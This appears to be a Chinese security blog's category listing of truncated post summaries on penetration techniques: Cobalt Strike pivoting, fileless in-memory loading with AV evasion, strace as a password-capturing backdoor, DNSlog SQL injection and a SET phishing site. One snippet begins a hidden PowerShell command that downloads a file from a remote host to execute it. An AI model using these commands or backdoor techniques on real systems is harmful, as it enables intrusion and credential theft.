摘要:0x01 前言 Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件。用法我的想法来说,相当于一个小集群,插件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等
阅读全文
|
|
文章分类 - 技巧分析
摘要:0x01 前言 Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件。用法我的想法来说,相当于一个小集群,插件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等
阅读全文
摘要:1.cs多层代理 目标机器: 第一层目标机器: 10.211.55.0 (通外网) 10.10.10.1 第二层目标机器: 10.10.10.2 (纯内网,不通外网) 当目标多层内网的时候,如何把每一层机器都上线到cs端呢,如果是msf直接可以一层一层写路由即可,cs需要借助上一层上线。 这里直接第
阅读全文
摘要:1.代码:java -Dhttp.proxyHost=ip -Dhttp.proxyPort=port -Dhttps.proxyHost=ip -Dhttps.proxyPort=1port -jar demo2.1.0.0.jar & 2、 java -Dsock5.proxyhost=ip -
阅读全文
摘要:长亭科技的xray扫描器的扫描效果还不错,在国内颇受好评,很有幸以前在长亭科技工作,技术氛围很好。扯得有点远了,话不多说,本文是是xray国光的学习记录,也可以当做新手的xray教程来用,不过我还是建议大家看看官方文档,只是国光我最近喜欢上了这种学习记录的感觉,学习效率很高。 简介 项目地址:htt
阅读全文
摘要:他的工作原理是:配置fofa语法的规则(写进配置文件f2Xconfig.yaml中),然后使用fofa接口搜索符合规则的网址,然后使用Xray的爬虫模块去批量检测。 我感觉这种批量的检测方式有一个缺点就是没有cookie,所以很多网页是没有权限获取到页面内容的。只不过你可以一边一边,让它自己跑 我今
阅读全文
摘要:首先说一下这个原理: Xray是被动扫描器,它检测的是经过某一端口的流量数据包来判断是否有漏洞,对于XSS漏洞有奇效;这样的话我们需要一个爬虫来产生大量流量,爬取各种网站,一般是Burpsuite/AWVS/Crawlergo这三个爬虫工具。 联动的效果是:白天电脑自动挖洞,然后你可以去做别的事情,
阅读全文
摘要:strace是一个动态跟踪工具,它可以跟踪系统调用的执行。我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围 使用场景 通过其他方式拿到shell,通过history、流量抓包、或者本地没有翻到密码的情况。我们想要获取当前主机的密码,或者通过这台主机连接到其他主机的密码。 安装 apt-g
阅读全文
摘要:powershell是一个很好的宝藏库,在内网中可能会给出意外惊喜。 挑一点重点说说,本文的杀软以火绒为主。 其实我们都用过powershell, 比如ls,dir 不过它只是Get-ChildItem别称。 常用命令和参数介绍: 命名规范:动词+名词=cmdlets -Get-ExecutionP
阅读全文
摘要:Server酱是什么 「Server酱」,英文名「ServerChan」,是一款「程序员」和「服务器」之间的通信软件。 说人话?就是从服务器推报警和日志到手机的工具。 开通并使用上它,只需要一分钟: 登入:用GitHub账号登入网站,就能获得一个SCKEY(在「发送消息」页面) 绑定:点击「微信推送
阅读全文
摘要:https://dashboard.ngrok.com/auth/your-authtoken 申请注册 账号 获取 key 下载对应的服务端 wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip unzip n
阅读全文
摘要:远程下载文件到本地并执行cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://12
阅读全文
摘要:由于要将钓鱼网站挂在本机的http服务下,所以需要将SET工具的访问端口改为默认的80端口。使用sudo vi /etc/apache2/ports.conf命令修改Apache的端口文件,将端口改为80,如下图所示 在kali中使用netstat -tupln |grep 80命令查看80端口是否
阅读全文
摘要:1.Linux下生成密钥 ssh-keygen的命令手册,通过”man ssh-keygen“命令: 通过命令”ssh-keygen -t rsa“ 生成之后会在用户的根目录生成一个 “.ssh”的文件夹 进入“.ssh”会生成以下几个文件 authorized_keys:存放远程免密登录的公钥,主
阅读全文
摘要:布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护我们需要一种方式能够减少请求,直接回显数据——Dnslog注入Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息 Dnslog盲注方法 登录http:
阅读全文
摘要:对于浏览器来讲小伙伴们肯定再熟悉不过了,浏览器是咱们居家旅行、访问网站之必用装备。有童鞋说了,杜克你聊得别的呗,浏览器谁不会用啊,还用你教呢?既然这样,那我就来给大家来点你所不懂的 -- 伪造自己的IP地址! 工具/原料 方法/步骤 1 安装插件:先打开火狐浏览器 => 找到下载好的 modify_
阅读全文
摘要:function createAjax(){ var request=false; //window对象中有XMLHttpRequest存在就是非IE,包括(IE7,IE8) if(window.XMLHttpRequest){ request=new XMLHttpRequest(); if(re
阅读全文
摘要:netstat -ano|findstr "ESTABLISHED" 根据pid查询进程 tasklist /SVC| 2052 根据运行的exe文件查找对应路径 wmic process where name="javaw.exe" get ExecutablePath C:\Program Fi
阅读全文
摘要:目标远程端口多少 改为多少[Client decrypted packet] - 385 bytes total; 358 bytes decrypted0000 03 00 01 81 02 f0 80 64 00 03 03 eb 70 81 72 48 .......d....p.rH0010
阅读全文
摘要:排名 服务商中文名称 NS服务器 域名个数 服务商网站 解析时间 排名 服务商中文名称 NS服务器 域名个数 服务商网站 解析时间 1 DNSPod f1g1ns1.dnspod.net f1g1ns2.dnspod.net 1237437 www.dnspod.cn 39.599ms - 379.
阅读全文
|
